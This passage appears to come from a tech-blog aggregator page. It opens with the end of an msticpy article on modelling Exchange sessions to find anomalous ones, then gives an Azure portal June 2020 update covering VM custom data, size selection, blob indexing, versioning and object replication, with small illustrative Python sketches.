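            probs[(prev, cur)] = (counts[(prev, cur)] + 1) / total
    return probs, vocab


def transition_prob(prev, cur, probs, vocab):
    """Look up a transition, mapping anything unseen in training to the UNK token."""
    prev = prev if prev in vocab else UNK
    cur = cur if cur in vocab else UNK
    return probs[(prev, cur)]


sessions = [["Set-Mailbox", "Set-User"]] * 3 + [["Set-User"]]
probs, vocab = train_smoothed(sessions)
unseen = transition_prob("Set-User", "Some-UnseenCmdlet", probs, vocab)
print(unseen)
```

Because every count is incremented by one, the transition from “Set-User” to the unknown token has a small non-zero probability even though it never occurred in the training sessions.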

The Laplace smoothing and usage of the ‘##UNK##’ token are applied by default and are currently not optional. We hope to make them optional via a configurable argument in the Model class in a future release of msticpy.

Summary

By combining various data science techniques, we sessionized, modelled and visualised our Office 365 Exchange data so that we could identify anomalous user sessions. We used msticpy and Jupyter notebooks to perform this analysis, leveraging the high-level functions inside the anomalous_sequence subpackage. We then did a deep dive into the underlying implementation for each of the model types. The methods outlined in this blog can be applied to other security log types in a similar way to aid with threat hunting.

by Scott Muniz | Jun 26, 2020 | Azure, Microsoft, Technology, Uncategorized

This article is contributed. See the original author and article here.

Azure portal June 2020 update

This month, Azure portal updates include support for custom data in virtual machines and VM scale sets, improvements to VM size selection, and new storage features: blob indexing, blob versioning, and object replication.

Sign in to the Azure portal now and see for yourself everything that’s new. Download the Azure mobile app to stay connected to your Azure resources anytime, anywhere.

Here’s the list of updates to the Azure portal this month:

Compute > Virtual machines

Storage > Storage accounts

Intune

Let’s look at each of these updates in greater detail.

COMPUTE>VIRTUAL MACHINES







Portal support for custom data in Virtual Machines and VM scale sets

Custom data is now available for Virtual Machines and VM scale sets in the Azure portal and can be used for injecting a script, configuration file, or other metadata into a Microsoft Azure virtual machine. Custom data is only made available to the VM during first boot or initial setup, which we call ‘provisioning’. Provisioning is the process where VM Create parameters (for example, hostname, username, password, certificates, custom data, and keys) are made available to the VM and a provisioning agent such as the Linux Agent or cloud-init processes them.
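When custom data is supplied outside the portal, for example in a template or an API request, it is, as far as we understand, passed as a base64-encoded string whose decoded payload is limited to 65,535 bytes. The following is a minimal sketch of preparing a cloud-init file that way. The helper name `encode_custom_data` and the sample cloud-init content are illustrative assumptions and are not part of any Azure SDK.

```python
import base64

# Assumed limit on the decoded custom data payload, in bytes.
MAX_CUSTOM_DATA_BYTES = 65535


def encode_custom_data(script: str) -> str:
    """Return the base64 text form of a custom data payload."""
    raw = script.encode("utf-8")
    if len(raw) > MAX_CUSTOM_DATA_BYTES:
        raise ValueError(
            f"custom data is {len(raw)} bytes; limit is {MAX_CUSTOM_DATA_BYTES}"
        )
    return base64.b64encode(raw).decode("ascii")


# Hypothetical cloud-init configuration processed during provisioning.
cloud_init = """#cloud-config
package_update: true
packages:
  - nginx
"""

encoded = encode_custom_data(cloud_init)
print(encoded)
```

In the portal itself the script or configuration file is entered as plain text in the custom data field, so this encoding step would only matter for scripted deployments.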

Learn more here.

COMPUTE>VIRTUAL MACHINES





VM size selection dropdown recalls your recently used sizes

We have introduced the size dropdown in the VM and VMSS create flows to provide quick access to the sizes you have recently used along with sizes recommended by the image publisher. No longer do you have to visit the full list of sizes if you only have a few that you use for deployments.

As you deploy different VM sizes, the list will grow up to 5 of your most recently used sizes. These sizes persist across your subscriptions so that you can always have quick access to the size you want. During the create VM and VMSS experiences, your most recently used size will be selected initially by default.

In addition to your recently used sizes, you may also see up to 3 sizes recommended by the image publisher.

To view your most recently used sizes:

1. Select the Virtual machines or Virtual machine scale sets service from the portal.

2. Click the Add button to create a new VM or VMSS.

3. Fill in the subscription, VM name, and any other fields you wish to enter before the Size field.

4. Press the size dropdown to see your recently used sizes. If you have not recently deployed any virtual machines, you will not see the section for recently used. After you deploy a VM or VMSS, you will find that size in the list.

COMPUTE>VIRTUAL MACHINES





VM size picker updates

Based on your feedback and on data we have analyzed, we have made significant updates to the VM size picking experience. One of the largest pieces of feedback we heard is that the filters were not working for your needs and caused confusion. We have removed default filtering and will now show a list of the most popular sizes across all Azure users to help you in the selection process.

Updates you will see and experience:

- Updated filter design to use dialog boxes instead of inline editing

- View costs per hour or per month

- Insights into the most used sizes by Azure users (these are denoted in the list with an icon)

- Updated search functionality – search is faster and will search across all sizes when you first enter the experience (no more clearing filters first)

- The selected image appears in the size picker for additional context

- Updated grid spacing for improved readability

To see the most popular sizes:

1. Select the Virtual machines or Virtual machine scale sets service from the portal

2. Click the Add button to create a new VM or VMSS

3. Fill in the subscription, VM name, and any other fields you wish to enter before selecting a size

4. Click the Select size link below the size dropdown

5. Select a size

STORAGE>STORAGE ACCOUNTS



Blob indexing now in public preview





Blob indexing allows customers to categorize data in their storage account using key-value tag attributes. These tags are automatically indexed and exposed as a multi-dimensional index that can be queried to easily find data. Through blob indexing, customers get native object management and filtering capabilities, which allow them to categorize and find data based on attribute tags set on the data.

Steps:

1. Create a storage account in one of the public preview regions (France Central or France South).

2. Create a container.

3. Select the “Upload” button and upload a file as a block blob.

4. Expand the “Advanced” section and go to the “Blob Index Tags” section.

5. Input the key/value pair(s) as your blob index(es).

6. Finish the upload.

7. Navigate to the Containers option under Blob Service, select your container.

8. Select the Blob Index tags filter button to filter within the selected container.

9. Enter a Blob Index tag key and tag value.

10. Select the Blob Index tags filter button to add additional tag filters (up to 10).
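The idea of tagging blobs with key-value attributes and then filtering on them can be illustrated with a small in-memory model. This is only a conceptual sketch, not how the service is implemented and not the Azure SDK: the `TagIndex` class, its methods, and the blob names and tags are all hypothetical.

```python
from collections import defaultdict


class TagIndex:
    """Toy model of blobs that are indexed by their key-value tags."""

    def __init__(self):
        self._tags = {}                 # blob name -> {tag key: tag value}
        self._index = defaultdict(set)  # (tag key, tag value) -> blob names

    def upload(self, name, tags):
        """Store a blob's tags, replacing any tags from an earlier upload."""
        for item in self._tags.get(name, {}).items():
            self._index[item].discard(name)
        self._tags[name] = dict(tags)
        for item in tags.items():
            self._index[item].add(name)

    def find(self, filters):
        """Return the names of blobs that match every key-value filter."""
        matches = set(self._tags)
        for item in filters.items():
            matches &= self._index.get(item, set())
        return sorted(matches)


index = TagIndex()
index.upload("invoice-001.pdf", {"project": "contoso", "status": "processed"})
index.upload("invoice-002.pdf", {"project": "contoso", "status": "unprocessed"})
index.upload("report.docx", {"project": "fabrikam", "status": "processed"})

print(index.find({"project": "contoso", "status": "unprocessed"}))
```

Each additional filter narrows the result, which mirrors adding further tag filters in the portal steps above.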

STORAGE>STORAGE ACCOUNTS





Blob versioning now in public preview

Azure Blob Versioning automatically maintains previous versions of an object (blob) and identifies them with version IDs. With this feature, customers can protect their data against erroneous modifications or accidental deletions. Customers can list both the current blob and previous versions using version ID timestamps. They can also access and restore previous versions as the most recent version of their data.

To enable blob versioning in the Azure portal:

1. Navigate to your storage account in the portal

2. Under “Blob service”, choose “Data protection”

3. In the Versioning section, select “Enabled”

4. Upload a blob

5. Make some modifications to that blob.

6. Click on that blob.

7. Navigate to the “Versions” tab, where you will see the previous versions for that blob. A previous version can be selected and made into the current version, which restores the blob to how it was at the given timestamp (version ID).
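The behaviour described in these steps (each modification leaves a previous version behind, and a previous version can be promoted back to current) can be modelled in a few lines. This is a conceptual sketch only: the `VersionedBlob` class is hypothetical, and a simple counter stands in for the timestamp-based version IDs the service uses.

```python
from itertools import count


class VersionedBlob:
    """Toy model: every write adds a version; the newest version is current."""

    def __init__(self):
        self._ids = count(1)   # stand-in for timestamp-based version IDs
        self.versions = []     # list of (version_id, content), oldest first

    def write(self, content):
        """Save new content and return the version ID assigned to it."""
        version_id = next(self._ids)
        self.versions.append((version_id, content))
        return version_id

    @property
    def current(self):
        """Content of the most recent version."""
        return self.versions[-1][1]

    def previous_versions(self):
        """IDs of every version except the current one."""
        return [version_id for version_id, _ in self.versions[:-1]]

    def restore(self, version_id):
        """Make an earlier version current by writing its content again."""
        content = dict(self.versions)[version_id]
        return self.write(content)


blob = VersionedBlob()
first = blob.write(b"original text")
blob.write(b"accidental overwrite")
blob.restore(first)
print(blob.current, blob.previous_versions())
```

In this model a restore does not delete anything: the overwritten content remains available as a previous version, which is what protects against erroneous modifications.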

STORAGE>STORAGE ACCOUNTS

Object replication (OR) now in public preview

Object replication asynchronously copies block blobs between a source storage account and a destination account. Some scenarios supported by object replication include:

- Minimizing latency–Latency for read requests can be reduced by enabling clients to consume data from a region that is in closer physical proximity.

- Increasing efficiency for compute workloads–Compute workloads can process the same sets of block blobs in different regions.

- Optimizing data distribution–Customers can process or analyze data in a single location and then replicate just the results to additional regions.

- Optimizing costs–After a customer’s data has been replicated, it can be moved to the archive tier using life cycle management policies, thus reducing costs.

To configure object replication in the Azure portal, first create the source and destination containers in their respective storage accounts if they do not already exist. Also, enable blob versioning and change feed on the source account, and enable blob versioning on the destination account.



Then create a replication policy in the Azure portal by following these steps:



1. Navigate to the source storage account in the Azure portal.

2. Under “Settings”, select “Object replication”.



3. Select “Set up replication”.

4. Select the destination subscription and storage account.

5. In the “Container pairs” section, select a source container from the source account, and a destination container from the destination account. You can create up to 10 container pairs per replication policy.



6. If desired, specify one or more filters to copy only blobs that match a prefix pattern. For example, if you specify a prefix ‘b’, only blobs whose names begin with that letter are replicated. You can specify a virtual directory as part of the prefix.

7. By default, the “copy scope” is set to copy only new objects. To copy all objects in the container or to copy objects starting from a custom date and time, select the “change” link and configure the copy scope for the container pair.

8. Select “Save and apply” to create the replication policy and start replicating data.
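The prefix filters and copy scope from steps 6 and 7 amount to a simple rule for deciding which blobs are copied. The sketch below expresses that rule under stated assumptions: the function `should_replicate` and its parameters are hypothetical, and the service's actual evaluation may differ in details. Here `copy_from=None` models "copy all objects", while a datetime models either a custom start time or, when set to the policy creation time, "only new objects".

```python
from datetime import datetime, timezone


def should_replicate(name, created, *, prefixes=(), copy_from=None):
    """Decide whether a blob falls inside a container pair's replication rule."""
    # With no prefix filters every blob name qualifies; otherwise one must match.
    if prefixes and not name.startswith(tuple(prefixes)):
        return False
    # copy_from=None means all objects; otherwise only blobs created on or after it.
    return copy_from is None or created >= copy_from


# Hypothetical policy creation time used as the "only new objects" cutoff.
policy_created = datetime(2020, 6, 26, tzinfo=timezone.utc)
older = datetime(2020, 6, 1, tzinfo=timezone.utc)
newer = datetime(2020, 6, 27, tzinfo=timezone.utc)

print(should_replicate("backups/db.bak", newer, prefixes=["b"], copy_from=policy_created))
print(should_replicate("logs/app.log", newer, prefixes=["b"], copy_from=policy_created))
print(should_replicate("backups/db.bak", older, prefixes=["backups/"]))
```

A prefix such as `backups/` shows how a virtual directory can be part of the filter.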

INTUNE

Updates to Microsoft Intune

The Microsoft Intune team has been hard at work on updates as well. You can find the full list of updates to Intune on the What’s new in Microsoft Intune page, including changes that affect your experience using Intune.

Azure portal “how to” video series

Have you checked out our Azure portal “how to” video series yet? The videos highlight specific aspects of the portal so you can be more efficient and productive while deploying your cloud workloads from the portal.

Next steps

The Azure portal has a large team of engineers that wants to hear from you, so please keep providing us your feedback in the comments section below or on Twitter @AzurePortal.

Don’t forget to sign in to the Azure portal and download the Azure mobile app today to see everything that’s new. See you next month!
